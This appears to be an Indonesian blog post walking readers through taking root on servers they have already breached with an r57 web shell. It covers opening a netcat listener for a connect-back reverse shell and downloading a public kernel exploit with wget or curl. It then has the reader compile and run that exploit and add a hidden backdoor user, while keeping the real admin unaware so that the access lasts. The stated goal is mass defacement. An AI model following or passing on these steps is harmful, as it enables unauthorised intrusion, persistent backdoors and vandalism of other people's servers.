[+] Tools :
- putty or bisa juga langsung dari shell di computer lo (bagi linux user)
- Exploit kernel
- Netcat
Klo punya shell jangan asal maen deface aja, or klo emang mo mass deface mendingan dari root aja lebih enak, ga perlu cape² jump client,
pertama cari dolo yg kernel'a emang support di local, apaan tuch local ? ya itu biasa di sebut ngeroot or take over root or local kernel,
1. pertama lo ketik gini di computer lo :
[root@localhost]# nc -vv -l -p 8585 (8585 adalah port, boleh lo ganti sesuka hati)
2. connect back target lo dari r57, coba lo scroll ke bawah, ada buat connect back, isi ip lo trus isi port yg lo tentuin, abis itu lo push button connect back'a
3. siapin local kernel'a, bisa lo cari di milw0rm dengan keyword "linux kernel"
4. kadang ada target yg ga bisa di connect back, mendingan lo upload bindtty or connect back paksa pake dc.pl (cari di google)
5. klo target lo udah connect back ke komputer lo, silakan lo lo ambil source xploit'a, command'a bisa lo pk : wget, fetch, curl-o, lwp-download, abis itu lo compile di sana dengan command:
[root@localhost]#gcc -o xploit xploit.c
./xploit
7. Tungguin bentar abis itu klo keluar tulisan
uid=(0) gids=(0) groups=(0)
itu berarti lo dah masuk root dia, selanjut'a tinggal lo add user aja di root itu, inget jangan di ganti password root dia, klo admin ga bisa masuk root gara² lo ganti, root bisa di reset sama si admin yg nanti'a lo ga dapet akses root lagi
8. untuk add user pada root command'a :
adduser rebel
passwd r3b3l
password : terserah
confirm password: sama kek password yg lo isi
FYI : klo connect back target di liat dolo server'a kek gimana, jangan mentang² kernel'a bisa di xploit trus maen connect back aja, kadang klo server gede dia langsung restart klo di connect back and sorry klo postingan gw terlalu nubie banget
About Me
Forum
I Hate Malaysia !!
INDONESIA
Visit Here
I Hate Malaysia !!
0 comments:
Posting Komentar